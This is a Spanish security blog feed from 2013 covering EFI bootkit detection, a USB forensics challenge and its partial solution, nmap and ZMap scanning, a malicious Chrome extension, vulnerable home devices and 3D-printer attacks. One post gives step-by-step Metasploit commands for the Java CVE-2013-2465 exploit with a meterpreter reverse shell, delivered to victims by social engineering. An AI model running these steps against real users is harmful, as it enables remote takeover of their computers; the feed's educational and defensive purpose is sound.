RDFU: un nuevo framework para la detección de bootkits en las "nuevas BIOS" (EFI)

August 13, 2013, 7:45 am

≫ Next: Reto 18: un pendrive y el caso de los coches robados

≪ Previous: Black hat SEO y #LasTetasDeRajoy

Según reza la Wiki "La Interfaz Extensible del Firmware, Extensible Firmware Interface (EFI), es una especificación desarrollada por Intel dirigida a reemplazar la antigua interfaz del estándar IBM PC BIOS, que interactúa como puente entre el sistema operativo y el firmware base."

En 2005 se creó la fundación UEFI (Unified Extensible Firmware Interface) cuya labor consistía en desarrollar y promocionar esta plataforma EFI y hoy en día la mayoría de los sistemas operativos sobretodo de 64 bits lo soportan, de hecho se prevé que Windows 8 sustituya completamente la BIOS por EFI.

Evidentemente esta "modernización" del arranque de los PCs no ha pasado inadvertida para los desarrolladores de malware que han fijado UEFI como uno de sus grandes objetivos, más aún cuando la detección y/o erradicación de rootkits o bootkits es muy difícil.

Para combatir esta nueva amenaza Reversing Labs ha desarrollado Rootkit Detection Framework para UEFI (“RDFU”) que incorpora un conjunto de herramientas y drivers que tratan este problema a lo largo de un gran número de implementaciones UEFI:

- enumera todos los drivers EFI cargados en memoria
- comprueba rangos de memoria en busca de ejecutables
- monitoriza nuevos drivers cargados hasta que se inicia el sistema operativo
- lista EFI BOOT SERVICES y EFI RUNTIME SERVICE en busca de modicaciones en punteros de función
- supervisa continuamente EFI BOOT SERVICES y EFI RUNTIME SERVICE mientras que se carga el sistema operativo
- muestra el mapa de memoria y vuelca tosas las regiones adecuadas
- lista y monitoriza rellamadas de eventos que pueden ser utilizadas por rootkits/malware
- trabaja en modo standalone sin el shell EFI

Descargas: White Paper | Blackhat 2013 Presentation | Source Code

↧

Reto 18: un pendrive y el caso de los coches robados

August 14, 2013, 3:37 am

≫ Next: Convierte nmap es un completo escaneador de vulnerabilidades con vulscan

≪ Previous: RDFU: un nuevo framework para la detección de bootkits en las "nuevas BIOS" (EFI)

La informática forense o análisis forense digital es la aplicación de técnicas científicas y analíticas especializadas a infraestructura tecnológica que permiten identificar, preservar, analizar y presentar datos que sean válidos dentro de un proceso legal.

Dichas técnicas incluyen reconstruir el bien informático, examinar datos residuales, autenticar datos y explicar las características técnicas del uso aplicado a los datos y bienes informáticos.

Despues de esta muletilla que me he "echao" a modo de introducción o explicación algo inútil, desde Hackplayers os animamos a que resolváis vuestro primer caso como forenses informáticos...

Good luck.
13 Agosto 2013 ...

Eres el agente funcionario número 38249827 de una corporación que brinda sus servicios de inteligencia al Gobierno...

Estabas en tu despacho ojeando eBay cuando de repente han entrado tus jefes con un encargo para ti:

Hace unos días detuvieron a un caco, que sospechan tiene más información de la que dice tener sobre una red de robo de coches de lujo.

En la detención se le incautó al supuesto delincuente, tan solo un usb que por casualidad es el que ahora tienes en tu mesa.

En un escaso corto espacio de tiempo tienes que arrojar luz sobre este misterio y dar con el paradero de los coches robados...

serás capaz de hacerlo??......

Descarga la imagen del pendrive:enlace

Esta vez todos aquellos que superen el reto (todos) escribirán su nombre (o nick) en nuestra página de retos. Si lo consigues mándanos el procedimiento seguido a nuestra cuenta de correo electrónico:

Y para cualquier duda, pista o inquietud (no sexual) ¡comenta esta entrada!

↧

Convierte nmap es un completo escaneador de vulnerabilidades con vulscan

August 16, 2013, 1:51 am

≫ Next: “¿Y quién soy yo? Ese es un secreto que nunca revelaré.”- Gossip girl…HACKER

≪ Previous: Reto 18: un pendrive y el caso de los coches robados

Hace tiempo hablamos de que nmap ya no era un simple escaneador de puertos gracias al NSE (Nmap Scripting Engine) que permite desarrollar scripts para
automatizar una amplia variedad de tareas de red incluido la posibilidad encontrar vulnerabilidades explotables en un sistema remoto.

Vulscan es un módulo que precisamente "convierte" a nmap en un completo escaneador de vulnerabilidades.

La opción -sV permite la detección de versiones por servicio que se utiliza para determinar posibles deficiencias de acuerdo con el producto identificado. Los datos se buscan en una versión offline de varias bases de datos de vulnerabilidades en formato csv que se almacenan en Nmap\scripts\vulscan\*:

* scipvuldb.csv | http://www.scip.ch/en/?vuldb
* cve.csv | http://cve.mitre.org
* osvdb.csv | http://www.osvdb.org
* securityfocus.csv | http://www.securityfocus.com/bid/
* securitytracker.csv | http://www.securitytracker.com
* xforce.csv | http://xforce.iss.net
* expliotdb.csv | http://www.exploit-db.com
* openvas.csv | http://www.openvas.org

Su uso con nmap es tan sencillo como ejecutar:

D:\>nmap -sV --script=vulscan.nse 192.168.1.62 -p 3389

o si se prefiere, es posible especificar el uso de una única base de datos con los siguientes argumentos:

--script-args vulscandb=securityfocus.csv

Más opciones e información en la web del proyecto: www.computec.ch/projekte/vulscan/

↧

“¿Y quién soy yo? Ese es un secreto que nunca revelaré.”- Gossip girl…HACKER

August 18, 2013, 2:53 pm

≫ Next: ZMap: una herramienta que puede escanear todo Internet en menos de una hora

≪ Previous: Convierte nmap es un completo escaneador de vulnerabilidades con vulscan

Nadie es como parece.

Uno a veces se mira sangrando en el asfalto, ve pasar la ambulancia y no la llama…y yo que ilusoriamente pensaba que ya sabía absolutamente TODO en la vida de hacking, mujeres, tramas y mafias. Bueno mas o menos, la verdad no tanto. Hay días donde tu pasado y tu presente se juntan y como buen Jedi Digital te pones en código rojo.

Queridos lectores de Hackplayers, hace tiempo que no tenía el placer de escribir en este blog, que sigo diariamente, y para el cual preparaba una entrada muy diferente; sin embargo las circunstancias me orillaron a preparar un post, cuya historia debo seguir en tercera persona, y entonces, quién mejor que yo para contárselas??

Por supuesto, lo primero de todo es agradecer su preciado tiempo, atención y al staff por permitir relatarles lo sucedido, porque la historia en sí, es una historia de temática real (la cual pretendo mezclar con ciertas poses de generalidad para no afectar la privacidad de los personajes), que hasta el momento carece de final feliz o triste, pero como sabrán tiene mucho que ver con los temas que en este espacio son de interés.

Para comenzar a ponerlos en contexto quiero hacer una breve anotación; como sabrán por los posts que he escrito, soy un aficionado más a la seguridad de la información, me gusta mucho todo lo relacionado con ella, y tengo la fortuna de poder trabajar en ello profesionalmente, es una pasión que he adquirido desde mis años universitarios. Ni modo de negarles la cruz de mi parroquia. Toda mi sangre es wanna be IT expert qué quieren que haga.

Entonces, lo que pretendo contarles comenzó en un día laboral al parecer bastante normal y que en pocas palabras jamás podíamos imaginarnos que iba a pasar la monserga que hasta la fecha no tiene respuesta. Les quiero compartir que aunque tengo una formación ingenieril, soy una persona que no subestima la suerte, la sugestión, la superstición, las leyes de Murphy, como ustedes gusten llamarle. Como nota personal (nada que ver con el tema) no han sido unos meses del todo afortunados en varias cuestiones de mi vida privada, sólo que… cual programa de Extranormal (y por allá en España me parece que es algo así como Cuarto Milenio de Iker Jiménez) miren… hace muy poco tiempo, unas 4 semanas, guardé esta imagen de mi shell de Linux, al ejecutar cierto comando picaresco (jamás me había salido esa frase, me llamó mucho la atención). Ahora pienso profundamente… le hubiera hecho mucho más caso.

Han utilizado el comando fortune de Linux? Como las pitonisas griegas, creepy

Enter the shadow realm…

Inexplicable que me dedique a esto de la seguridad, el hacking, las regulaciones, las implementaciones, las certificaciones, si yo jamás he sido bueno para el ajedrez, odio las situaciones en las que hay que atacar y defenderse al mismo tiempo, todo el tiempo.

A lo mejor es porque en ciertas ocasiones me excita la adrenalina, y que las circunstancias pendan de un hilo, para que luego mágicamente tomen otro rumbo, ya sea que se arreglen o terminen de joderse por completo. No me digan que esta área no tiene magia, no sean ingenuos por favor, cualquiera de nosotros sabe que si esa noche, donde vamos a poner a funcionar un API de la cual dependa todo un corporativo, hay luna llena, simplemente el compilador no va a hacer su trabajo como debe. Así de sencillo, así de crítico, así de misterioso.

Mi papel en esta historia, o mi lugar en esto que empiezo a decirles, consiste exactamente en no tener ni lugar, ni papel, ni siquiera sentido. En algún otro post puse la siguiente frase “Confías una dos, tres, diez veces, hasta que claro llega uno y te acuchilla”. Y en verdad no es muy agradable.

Sucede que un día, hace casi un mes aproximadamente, teníamos en activo un proyecto con una empresa considerablemente grande, y por supuesto por la dimensión del asunto se requería del equipo titular completo. El proyecto consistía en varias cosas que detallaré en keypoints (puntos clave para los puritanos), y nuestro papel era ejecutar cada uno de ellos a la brevedad posible y con la máxima calificación (o el mayor éxito para los puritanos):

1) Hardening de toda la red perimetral.- En pocas palabras meterles su red corporativa en un corral de alambres electrificados, y que los cuidara Cerbero en cada una de sus fronteras.

2) Detección de código malicioso a través de: Descompresión; Descifrado, Desempaquetado o desensamblado.- O sea que para cualquier cosa que pasara en su red, lo agarráramos, lo analizáramos y viéramos que no tuviera una ETS.

3) Revisión de código, aplicaciones, servidores, y segmentos para confirmar actividades dañinas o comportamiento peligroso.- En sí, encuerarlos a todos y ver que no tuvieran un coche bomba en sus intestinos.

4) Investigación de procesos fraudulentos y ataques internos y externos.- O sea, si alguien les estaba metiendo goles al por mayor decirles quiénes y cómo.

5) Pruebas de penetración a la red crítica.- Eso quiere decir que, nosotros les íbamos a meter los goles, de manera controlada, pero a partir de ello, quizá les íbamos a poner un portero como Iker Casillas (no Iker Jiménez).

Bueno… el proyecto como pueden notar era considerablemente delicado por los keypoints que íbamos a trabajar. Aunque claro no era algo que con sus debidos cuidados, procesos y NDA’s pertinentes no se pudiera realizar. Como todo.

La verdad no pretendo decirles cómo fue que empezamos a llevarlo a cabo, porque sinceramente no es relevante en este asunto. Mejor les diré cómo empezamos a ya no llevarlo a cabo, y por qué. Eso es lo relevante en la historia, y lo que nos tiene en ascuas.

El problema con los problemas es que crecen y traen al mundo problemitas.

Les comenté que para un proyecto así se requería del equipo titular completo no? Y si. Nos mandaron a toda la bola de coatlicue-geeks por experiencia y convicción a revolcarnos en bits bytes, red bulls, comida chatarra, y en general al ambiente de LAN party que nos esperaba ahí metidos en los lugares donde debíamos clickear “Siguiente à Siguiente à Aceptar” y ya, listo.

En fin, qué les puedo yo contar de esa clase de personas con ese tipo de trabajitos, que ustedes no sepan? Dudo que entre tanto geek y maleante sea posible distinguirme a mí, que al cabo elegí ser nerd inconsecuente. Uno los ve a todos como sus iguales, sus fella’s, camaradas, inge’s, etc. Sin embargo, tal cual, uno de ellos para nuestra muy malísima fortuna, le sobraron ganas para elegir las 30 monedas de plata, en lugar de nosotros.

¿Por qué razón estoy trayendo un Judas a la historia?, ¿Cuál es el motivo? ¿De dónde puedo mezclar dos conceptos hacking-Judas para tenerlos en una misma historia y que mi relato no roce la locura? ¿Qué clase de razón, por torcida que fuera, podría convertir a una mujer en niña, a la niña en Ingeniera y a la ingeniera en cucaracha?

Como ya me gustó utilizar la palabra keypoints, porque siento resume muy bien todo, se los pondré en keypoints, ya luego ahondaré un poco en los keypoints, no mucho la verdad:

- Una de las niñas de nuestro equipo de trabajo, se le ocurrió empezar a hacer el pentesting sin avisarnos, como no nos avisó no sabíamos que ya se estaba ejecutando la prueba. Y por obvias razones de confianza y empowerment no se le preguntaba de algo que en sí no estaba en planes de hacerse, todavía.

- El Pentesting se iba a realizar hasta el final, para hacer todo el hardening. Nadie del equipo de nuestro cliente, nos informó de las actividades de esta niña. Lo cual también es raro si me permiten la aclaración, porque jamás nos dejaban solos y sabían que el pentest se haría hasta el último. Anyway.

- Ustedes saben que en el pentesting se saca muchísima información de la empresa, los activos, los talones de Aquiles, en materia de Seguridad TI, todo no? Ahora imagínense si nos dejan hacer un Pentesting de Caja Blanca desde adentro de la organización. Recuento de los daños (aquí van unos subkeypoints)

o   Extracción de información altamente crítica en los servidores de la Red Interna.

o   Extracción de cuentas personales de la empresa y contraseñas del personal.

o   Override de configuración de equipos perimetrales: Firewalls, IPS, routers fronteras, para habilitar un usuario root desde la red pública con permisos de nivel 7.

o   Y nada más para no dejar, un malwersito por ahí que reiniciaba las máquinas, tipo Sasser. Ah claro la consola de Antivirus, bye bye darling.

o   Como ven? Sexy no?

Y qué creen que paso con nosotros y con ella? Bueno a simple vista parece bastante obvio en primer lugar quién fue la culpable ( y si lo es). Es verdaderamente increíble porque no es posible imaginárselo, anticiparse. Cada que la veía hablando con su inglés mocho, se me figuraba a un lanchero con el pelo oxigenado y la gringota junto, no sentía que tenía el perfil para realizar semejante masacre.

*** Como artículo complementario a esta historia me gustaría compartir este enlace interesante “Greenhats sustituyen a BlackHats” http://www.thoughtcrime.org/blog/saudi-surveillance/   (le toca a algunos vivir del lado chueco, es una maldición que ni el dinero alcanza para quitarte)***

Yo digo que uno nunca le confiesa al padre los pecados que piensa cometer. “Me acuso, padre, de que el año que entra voy a masacrar una red completa”. Y como no se puede vivir siempre en desequilibrio, de pronto hay que inventarse una ruleta rusa que desarme la realidad de cada persona.

Y repito, qué creen que pasó con ella y con nosotros? Después de unas largas semanas, con que se aclaraban los hechos, por supuesto una demanda para no variar, y de saber el perfil criminal que ahora ya tiene nuestra querida excompañera, ya estamos entrando en un cauce un poco más tranquilo, sin saber de ella obvio, ni bien a bien cómo lo hizo. A nosotros claro nos habían vetado/intervenido redes sociales y celular de la compañía, protocolario el bussiness, investigado nuestra relación con ella y toda la onda por obvias razones. No hubo más, debo decir al respecto, y no hay más que decir de lo que sepa, ya la buscan. Sin embargo, desde mi perspectiva hasta ahora ha sido (para ella). Victoria completa: la red comprometida, los datos ganados, y el enemigo (y los “amigos”) destruidos.

Happy Hacking…

↧

ZMap: una herramienta que puede escanear todo Internet en menos de una hora

August 19, 2013, 8:03 am

≫ Next: Cuidado con la extensión de Chrome de Series.ly...

≪ Previous: “¿Y quién soy yo? Ese es un secreto que nunca revelaré.”- Gossip girl…HACKER

$ zmap -p 443 –o results.txt
34,132,693 listening hosts
(took 44m12s)

ZMap es una herramienta de código abierto desarrollada por un grupo de investigadores de la Universidad de Michigan con la cual es posible escanear TODO el espacio de direcciones IP versión 4 de Internet desde un único PC en tan sólo 45 minutos.

Sí, has oído bien, todo Internet desde un único equipo con una conexión decente, es decir con una buena subida, es capaz de cubrir el 98% de direcciones ¡en menos de 1 hora!

¿Increíble verdad? Si lo comparamos con el modo más agresivo de Nmap, ZMap es 1300 veces más rápido y lo hace a grosso modo mediante diversas técnicas:

- Testing optimizado: envía conexiones tan rápido como soporte la tarjeta de red, saltando la pila TCP/IP y generando directamente frames Ethernet.
- No necesita guardar el estado de conexión: selecciona las direcciones de acuerdo a una permutación aleatoria generada por un grupo multiplicativo cíclico.
- No necesita retransmitir paquetes: siempre envía el mismo número de pruebas por host (normalmente por defecto sólo una).

¿Y qué aplicación tiene? Pues por ejemplo han realizado diversos estudios para ver la adopción de HTTPS, han descubierto miles y miles con UPnP vulnerables e incluso observado los efecto del huracán Sandy en la infraestructura de Internet.

Sólo una cosa, echad un vistazo a las buenas prácticas propuestas por sus desarrolladores y utilizarla con responsabilidad y de forma ética... my friends.

ZMap · The Internet Scanner
    Paper investigación
    Documentación
    Proyectos
    Descargas

↧

Cuidado con la extensión de Chrome de Series.ly...

August 20, 2013, 8:14 am

≫ Next: Libro: historias de developers

≪ Previous: ZMap: una herramienta que puede escanear todo Internet en menos de una hora

Series.ly Extended es una extensión de Chrome que añade mejoras en series.ly, un portal español "de películas, series y documentales". Con este plugin podrás filtrar mejor los enlaces, obtener enlaces a torrents y funcionalidades durante la navegación... pero también (y lo que no dicen) contribuir a monetizar su contenido mediante enlaces ocultos, obtención de historial de navegación del usuario e inserción de publicidad no deseada.

Así lo confirma una entrada en stopmalvertising que advierte que este plugin utiliza scripts de Skimlinks y añade publicidad de los sitios s.m2pub.com, creative.m2pub.com, www.adcash.com (muy nombrado en enero por enlazar a varios sitios con malware) y ads.adpv.com en las páginas de descarga y streaming:

allmyvideos.net | bitshare.com | cinetube.es | divxonline.info | es.wuaki.tv | freakshare.com | google.es | imdb.com | mitele.es | nowvideo.eu | nubeox.com | played.to | series.ly | series21.com | streamcloud.eu | thepiratebay.sx | uploaded.net | youtube.com

Además en su última versión este plugin tiene permisos de actualización automática por lo que podrían añadirse cambios de forma casi inadvertida, así que moraleja, antes de instalar ésta o cualquier extensión desconfía...

↧

Libro: historias de developers

August 21, 2013, 9:48 am

≫ Next: CVE-2013-2465 - Java storeImageArray() Invalid Array Indexing

≪ Previous: Cuidado con la extensión de Chrome de Series.ly...

Historias de Developers es un libro escrito por un buen puñado de empleados de Telefónica I+D en el que cada uno ha escrito un capítulo sobre cosas que creía que podrían ayudar a otros desarrolladores, pero también a otras personas que gestionan desarrolladores: motivación, testing, debugging & profiling, seguridad, ahorro de código, desarrollo móvil, …

En resumen estamos ante un libro gratuito bajo licencia cc con más de 380 páginas y 26 capítulos con muchas de las cosas que querrías saber acerca de cómo y qué hacen otros developers. ¡No te lo pierdas!

Disponible en Lulu.com: formato físico PDF ePub
Disponible en Amazon: Formato físico Kindle
Disponible en iBookStore: iBook

↧

CVE-2013-2465 - Java storeImageArray() Invalid Array Indexing

August 23, 2013, 12:11 am

≫ Next: Sí, tú casa está llena de dispositivos que pueden ser “hackeados” :)

≪ Previous: Libro: historias de developers

Este módulo de Metasploit abusa de la vulneravilidad matriz indexación no válida en la función storeImageArray() de la función estática para producir una corrupción de memoria y finalmente evadir el Sandbox de Java. La vulnerabilidad afecta a Java versión 7u21 y versiones anteriores.

Explotando CVE-2013-2465 con Metasploit:// Cargamos el módulo

msf > use exploit/multi/browser/java_storeimagearray
msf exploit(java_storeimagearray) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(java_storeimagearray) > set LHOST [IP Local]
msf exploit(java_storeimagearray) > set srvhost [IP Local]
msf exploit(java_storeimagearray) > set uripath /
msf exploit(java_storeimagearray) > exploit

Ahora realizamos un poco de Ingeniería Social para enviar la dirección generada por el metasploit para hacer la sesion meterpreter.

Saludos, \0/

Contribución gracias a Stuxnet Hack

↧

Sí, tú casa está llena de dispositivos que pueden ser “hackeados” :)

August 23, 2013, 6:37 am

≫ Next: Ataques a impresoras 3D

≪ Previous: CVE-2013-2465 - Java storeImageArray() Invalid Array Indexing

"Y por fin llegó arrastrándose al sillón después de una dura jornada, buscó y rebuscó el mando entre los cojines y encendió su televisor. Un escalofrío precedió a un sin fin de pálpitos acelerados porque de repente se vio dentro de él con un mensaje que amenazaba "te estamos vigilando". Su primera reacción fue llamar a la policía pero, al descolgar el interfono, la pantalla led del teléfono IP mostraba el mismo mensaje "te estamos vigilando". Agarró su chaqueta y anduvo hacia la puerta con el único objetivo de escapar, pero la puerta automática hacia su salvación estaba bloqueada. El suspiro de resignación evidenció vapor al exhalar, la temperatura había disminuido y para rematar las luces desvanecían sumergiendo su cuerpo en la oscuridad de aquel pasillo. Dio tres pasos a ciegas y el pánico le invadió al percatarse de que unas extrañas luces le perseguían. Corrió a encerrarse dentro del cuarto de baño, la tapa del inodoro se levantó automáticamente y cayó fulminado al suelo..."

Fantasmas, extraterrestres, ... no, HACKERS!

Cada vez nuestros hogares se equipan con más y más electrodomésticos y gadgets que nos hacen la vida más fácil y que pueden controlarse desde Internet. No obstante si alquien fuera capaz de controlarlos veríamos absolutamente expuestos nuestra intimidad e incluso seguridad.

Lo que contaba al principio con ese breve relato podría provocarlo ya HOY un hacker y para demostrarlo queremos plantearos un modelo de casa corriente. La siguiente planta muestra un pequeño piso con una serie de modelos de dispositivos que pueden adquirirse en la actualidad. Cada uno de ellos tiene o ha tenido la vulnerabilidad brevemente descrita y en cada uno podéis ver las consecuencias...

¡Hogar, dulce hogar!

1.- Router Cisco Linksys WRT54GL
Descripción: Router de banda ancha Wireless-G con dos antenas externas y 4 puertos ethernet.
Vulnerabilidad: La no-validación del parámetro wan_hostname puede permitir inyectar y ejecutar comandos de shell.
Enlace: http://tools.cisco.com/security/center/viewAlert.x?alertId=27942
Consecuencias: Un atacante remoto podría conseguir permisos de root obteniendo así el control total del router. Con ello podría por ejemplo modificar la configuración WiFi, cambiar las IPs de los DNS en el servidor DHCP, añadir rutas, etc.

2.- Receptor de satélite NBOX 5800SX ENIGMA2
Descripción: receptor/decodificador en alta definición con doble sintonizadora y disco duro de 250gb
Vulnerabilidad: el dispositivo implementa el sistema de acceso Conax con la funcionalidad chipset pairing que tiene diversas debilidades
Enlace:http://www.security-explorations.com/en/SE-2011-01-press.html
Consecuencias: un atacante podría capturar la señal decodificada y distribuirla en Internet.

3.- Televisión Samsung UE46F6400

Descripción: Televisor LED 3D de 46 pulgadas con SmartTV (Full HD 1080p, Clear Motion Rate 100 Hz).
Vulnerabilidad: fallo que permite el acceso root al shell del firmware basado en Linux.
Enlace:http://vimeo.com/55174958
Consecuencias: control total. Un atacante podría por ejemplo acceder al contenido del TV o de cualquier dispositivo USB conectado o incluso espiar al usuario activando la cámara y el micrófono remotamente.

4.- Media center Apple TV 2 con XBMC 11
Descripción: reproductor que permite ver películas de iTunes en 1080p HD, escuchar música y ver fotos de iCloud y usar AirPlay para reproducirlas desde otros dispositivos y, si se le realiza un jailbreak, utilizar XBMC uno de los principales distribuciones para mediacenters bajo la licencia GNU/GPL.
Vulnerabilidad: directory traversal en el servidor web
Enlace:http://www.ioactive.com/pdfs/Security_Advisory_XBMC.pdf
Consecuencias: un atacante podría leer remotamente cualquier archivo con los mismos privilegios que tenga el usuario que está ejecutando XBMC. Se ha publicado incluso un módulo en Metasploit.

5.- Teléfono Cisco Unified IP Phone 6941

Descripción: teléfono IP con conexión Gigabit ethernet y pantalla a color.
Vulnerabilidad: fallo al validar las llamadas al kernel desde aplicaciones corriendo en el espacio de usuario.
Enlace:http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130109-uipphone
Consecuencias: Aunque parece que para ejecutar el exploit es necesario validarse previamente por SSH (o tener acceso físico al dispositivo) si se consigue el atacante tendría acceso como root al teléfono y podría cambiar su programación, actuar sobre los leds, capturar llamadas, etc.

6.- Termostato Radio Thermostat Company of America CT 80 Descripción: termostato universal que puede controlar casi cualquier sistema residencial común HVAC. Soporta hasta 3 etapas de calor, 2 etapas de frío, bombas de varias etapas de calor, humidificadores, deshumidificadores y deflectores de aire externos. Puede mostrar mensajes de texto y consumo de energía.
Vulnerabilidad: no es necesario ninguna autenticación para usar el API.
Enlace:https://www.trustwave.com/spiderlabs/advisories/TWSL2013-022.txt
Consecuencias: Cualquier usuario en la misma red del dispositivo podría cambiar la temperatura, el modo de operación o la configuración wifi.

7.- AlertMe/Zigme
Descripción: Sistema modulable de control de la seguridad del hogar con múltiples componentes como sensores de ventanas y puertas, detectores de movimiento, alarmas, cámaras, etc.
Vulnerabilidad: los componentes del sistema utiliza el protocolo inalámbrico Z-Wave que aunque implementa cifrado AES en sus comunicaciones pone en claro el intercambio de claves inicial.
Enlace:http://www.theregister.co.uk/2013/08/13/wave_goodbye_to_security_with_zwave/
Consecuencias: Un atacante podría interceptar las comunicaciones y obtener el control de los dispositivos.

8.- RP40 multiCLASS® Reader
Descripción: Lector RFiD compatible con tarjetas HID Prox, Microprox, iCLASS y MIFARE.
Vulnerabilidad: la longitud y tipo de clave (PIN numérico) y la carencia de otras contramedidas permiten el uso de ataques de fuerza bruta.
Enlace:http://hackerhurricane.blogspot.com.es/2011/03/w-my-security-research-discovers-major.html
Consecuencias: sólo conociendo la IP del dispositivo es posible lanzar un ataque de fuerza bruta con éxito y rapidez. La consecuencia es la apertura inmediata de la puerta.

9.- TP-Link TL-SC3171 IP Camera
Descripción: Cámara de vigilancia de Día/Noche con 12 LEDs infrarrojos y video en tiempo real en cualquier lugar desde el iPhone y otros teléfonos 3G populares.
Vulnerabilidad: múltiples vulnerabilidades pueden permitir la inyección remota de comandos, el uso de credenciales "hard-coded" o la evasión de autenticación.
Enlace: http://www.coresecurity.com/advisories/multiple-vulnerabilities-tp-link-tl-sc3171-ip-cameras
Consecuencias: control total de la cámara. Su explotación más común es la obtención remota de vídeo en tiempo real (incluso de noche) de la víctima.

10.- LIXIL Satis Toilet
Descripción: Inódoro inteligente que automatiza la apertura y cierre de la tapa, activa automáticamente el agua, higieniza, ahorra energía... y hasta tiene música.
Vulnerabilidad: la aplicación Android "My Satis" tiene fijada (hard-coded) el pin bluetooth.
Enlace:https://www.trustwave.com/spiderlabs/advisories/TWSL2013-020.txt
Consecuencias: un atacante puede hacer que el inodoro tire de la cadena varias veces, que se abra/cierre inesperadamente la tapa, que se activen
las funciones del bidé o funciones de secado al aire causando malestar o angustia a usuario.

11.- Foscam FI8910W (White) Wireless B/G/N IP Camera
Descripción: Cámara IP que puede utilizarse como baby monitor con conectividad inalámbrica N y compatible con smartphones (Iphone, Android y Blackberry) y también accesible mediante web.
Vulnerabilidad: Directory traversal en el interfaz web con firmware anterior a 11.37.2.49 permite leer remotamente ficheros, incluyendo las credenciales web y wifi que utiliza el dispositivo.
Enlace: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2560
Consecuencias: Un atacante puede tomar el control de la cámara y espíar a su víctima.

12.- Roomba iRobot 585
Descripción: robot aspirador con sistema de navegación inteligente iAdapt y sistema de limpieza en 3 etapas patentado.
~~Vulnerabilidad:~~ Ejecutando ROS es posible acceder al controlador del sensor sin autenticación.
Enlace:http://www.ros.org/wiki/Robots/Roomba
Consecuencias: Mediante una aplicación en ROSjava (por ejemplo en Android) un atacante podría controlar remotamente el dispositivo.

13.- HP Pavilion dv3-4130ss
Descripción: Portátil con procesador i5-460M, 4 gbs de RAM y disco duro SATA de 320 GB (7200 rpm). Viene con sistema operativo instalado Windows® 7 Home Premium 64 bits.
Vulnerabilidad: La funcionalidad CMM (color management) en el componente 2D de Oracle Java SE 7 Update 15 y anteriores, 6 Update 41 y anteriores y 5.0 Update 40 provoca una corrupción de memoria en la JVM si recibe parámetros específicamente modificados.
Enlace:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1493
Consecuencias: Un atacante remoto podría provocar un DoS o ejecutar código arbitrariamente. Por ejemplo esta vulnerabilidad ha sido utilizada por el troyano McRAT que a su vez permite la descarga e instalación de otro malware.

14.- HP LaserJet Pro CP1025nw
Descripción: Impresora láser color, inalámbrica y con conexión Ethernet.
Vulnerabilidad: Ciertas impresoras HP LaserJet Pro contienen un bug en el servicio telnet que podría permitir a un atacante obtener acceso al dispositivo.
Enlace:http://www.kb.cert.org/vuls/id/782451
Consecuencias: Un atacante podría tener acceso a información confidencial.

15.- Samsung Galaxy III Mini i8190
Descripción: Smartphone con pantalla AMOLED de 4" y sistema operativo Jelly Bean.
Vulnerabilidad: Desde Android 1.6 Donut hasta 4.2 Jelly Bean no se comprueba correctamente la firma criptográfica de una aplicación.
Enlace:http://www.cvedetails.com/cve/CVE-2013-4787/
Consecuencias: Un usuario podría instalar una aplicación modificada de forma maliciosa sin percatarse permitiendo la instalación de malware en el dispositivo.

16.- Karotz plastic bunny
Descripción: Juguete que es un conejo de plástico que puede ser controlado desde un smartphone y que está equipado con una cámara de video, micrófono, chip RFID y altavoces.
Vulnerabilidad: es posible escribir un módulo en Python en un pendrive USB y cargarlo al iniciar el juguete. Además las credenciales para el control del dispositivo (tokens de sesión) se transmiten en claro por HTTP y pueden ser interceptadas.
Enlace:https://www.trustwave.com/spiderlabs/advisories/TWSL2013-021.txt
Consecuencias: Por ejemplo, si la aplicación utiliza la cámara web, el vídeo puede ser capturado y enviado a un servidor arbitrario.

↧

Ataques a impresoras 3D

August 26, 2013, 8:16 am

≫ Next: Solucion al reto 18 "un pendrive y el caso de los coches robados"

≪ Previous: Sí, tú casa está llena de dispositivos que pueden ser “hackeados” :)

El pasado viernes el investigador Claud Xiao presentó “Security Attack to 3D Printing” en la conferencia XCON 2013 en Pekin, que por el nombre podréis adivinar que se trata de una charla pionera en este tema.

En la presentación se vieron algunos problemas de seguridad generales en los sistemas de impresión 3D y se presentaron tecnologías y herramientas para RepRap, un proyecto de código abierto para normalizar lo que sería una impresora 3D "doméstica".

Además, en la parte final, se hicieron tres demostraciones sobre cómo modificar automáticamente la placa Arduino y el firmware de RepRap Mendel Prusa para cambiar su comportamiento.

Presentación (110 diapositivas):
http://www.claudxiao.net/Attack3DPrinting-Claud-en.pdf (inglés)
http://www.claudxiao.net/Attack3DPrinting-Claud-zh_cn.pdf (chino)

PoC:
https://github.com/secmobi/attack-arduino-and-reprap

↧

Solucion al reto 18 "un pendrive y el caso de los coches robados"

August 27, 2013, 5:00 am

≫ Next: ...y para Linux permítame sugerirle el exploit...

≪ Previous: Ataques a impresoras 3D

Ante todo daros las gracias por lo bien que lo he pasado leyendo vuestros reportes en referencia a la solución del reto, ha habido de todo un poco... rápidas, acertadas, menos acertadas..."ha estao guay!!".

Como podréis haber visto la solución en cuestión no era nada difícil... y hemos querido darle aires de realidad enfrentándonos al problema desde un enfoque práctico y sencillo... pero os prometo que el próximo será más complicado.

Como acostumbramos veremos la manera más automática y rápida de hacerlo y la menos automática o, digamos, más artesanal.

Para resolver la ecuación tan solo teníamos la imagen iso de un pendrive, lo cual nos dejaba más o menos el camino claro y unas pocas incógnitas.

Deberíamos ver qué sistema de archivos era y luego montarlo... y si pensamos un poco más allá quizás recuperar archivos, etc, etc...

Es ahí donde llega nuestra primera decisión: pensar en una herramienta que nos dé todo en este tipo de problemas, es decir, el camino más corto que sería tirar de tool especializada o, como ya veremos, hacerlo más a pelo como a mí más me gusta.

Primera solución:

Creo que a estas alturas a la mente de todos nos llega AUTOPSY...

Autopsy es un frontal Web que permite realizar operaciones de análisis forense sirviendo como interfaz gráfico del popular juego de herramientas forenses The Sleuth Kit (TSK). TSK es un referente en el mundo del análisis forense mediante línea de comandos, y permite a los investigadores lanzar auditorías forenses no intrusivas en los sistemas a investigar.

El programa Autopsy corre en diversos sistemas operativos como Linux, Unix y hasta en el sistema operativo Microsoft y por supuesto es LIBRE... así que ¡vamos a usarlo! (alguno de vosotros ha tirado de otra herramienta auxiliar para montar la imagen, aunque no es necesario en nuestro caso porque Autopsy lo hace por sí solo)

http://sleuthkit.org/autopsy/v2/download.php

Para instalar Autopsy lo podemos hacer como queramos desde los repos, bajándolo y compilando, etc, etc.

#autopsy

Cuando arrancamos la aplicación... tendremos que conectar con el frontend:

http://localhost:9999/autopsy
